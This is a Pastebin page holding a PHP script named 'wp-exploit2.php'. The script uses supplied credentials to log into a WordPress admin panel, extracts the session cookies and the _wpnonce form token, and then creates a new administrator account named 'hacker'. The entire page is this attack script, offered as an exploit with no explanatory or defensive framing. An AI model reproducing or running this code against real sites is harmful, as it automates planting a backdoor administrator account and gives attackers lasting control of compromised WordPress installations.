h8rt3rmin8r

wp-exploit2.php

Oct 19th, 2018
194
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. // set the url of the wordpress site to do this on
  3. $wp_url = 'http://localhost/wordpress';
  4. // this will only work if we already have a username and password
  5. $username = 'admin';
  6. $password = 'supersecret';
  7. // set the username, password, and email of the new user we will create
  8. $new_username = 'hacker';
  9. $new_password = 'letmein';
  10. $new_email = 'hacker@fakeemailaddress.com';
  11. // make up a user agent to use, lets say IE6 again
  12. $user_agent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)';
  13. // start by logging into wordpress (using POST, not GET)
  14. $ch = curl_init();
  15. curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-login.php');
  16. curl_setopt($ch, CURLOPT_POST, true);
  17. curl_setopt($ch, CURLOPT_POSTFIELDS, 'log='.urlencode($username).'&pwd='.urlencode($password).'&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1');
  18. curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-login.php');
  19. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  20. curl_setopt($ch, CURLOPT_HEADER, true);
  21. curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
  22. $output = curl_exec($ch);
  23. curl_close($ch);
  24. // search $output for the four cookies, add them to an array
  25. $index = 0;
  26. $cookieStrings = array();
  27. for($i=0; $i<4; $i++) {
  28.     $start_string = 'Set-Cookie: ';
  29.     $start = strpos($output, $start_string, $index) + strlen($start_string);
  30.     $end_string = ';';
  31.     $end = strpos($output, $end_string, $start);
  32.     $cookieStrings[] = substr($output, $start, $end-$start);
  33.     $index = $end + strlen($end);
  34. }
  35. // turn cookies into a single cookie string (skipping 4th cookie, since it's the same as 2nd)
  36. $cookie = $cookieStrings[0].'; '.$cookieStrings[1].'; '.$cookieStrings[3];
  37. // load the add user page
  38. $ch = curl_init();
  39. curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
  40. curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/');
  41. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  42. curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
  43. curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  44. $output = curl_exec($ch);
  45. curl_close($ch);
  46. // search for _wpnonce hidden field value
  47. $start_string = '<input type="hidden" id="_wpnonce" name="_wpnonce" value="';
  48. $start = strpos($output, $start_string, 0) + strlen($start_string);
  49. $end_string = '" />';
  50. $end = strpos($output, $end_string, $start);
  51. $_wpnonce = substr($output, $start, $end-$start);
  52. // add our new user
  53. $ch = curl_init();
  54. curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
  55. curl_setopt($ch, CURLOPT_POST, true);
  56. curl_setopt($ch, CURLOPT_POSTFIELDS, '_wpnonce='.urlencode($_wpnonce).'&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login='.urlencode($new_username).'&first_name=&last_name=&email='.urlencode($new_email).'&url=&pass1='.urlencode($new_password).'&pass2='.urlencode($new_password).'&role=administrator&adduser=Add+User');
  57. curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/user-new.php');
  58. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  59. curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
  60. curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  61. $output = curl_exec($ch);
  62. curl_close($ch);
  63. ?>
RAW Paste Data